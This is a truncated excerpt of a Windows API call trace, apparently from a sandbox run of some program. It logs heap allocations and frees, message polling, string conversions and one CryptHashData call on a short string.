HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0128.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0128.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0128.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ba8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.498] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0128.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0128.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54cf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0128.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0128.504] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b18 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0128.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0128.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b18 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b18 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.506] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50b18 [0128.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b18, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0128.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.508] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.508] CryptHashData (hHash=0xa87490, pbData=0x2e54ba8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0128.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0128.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b18 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 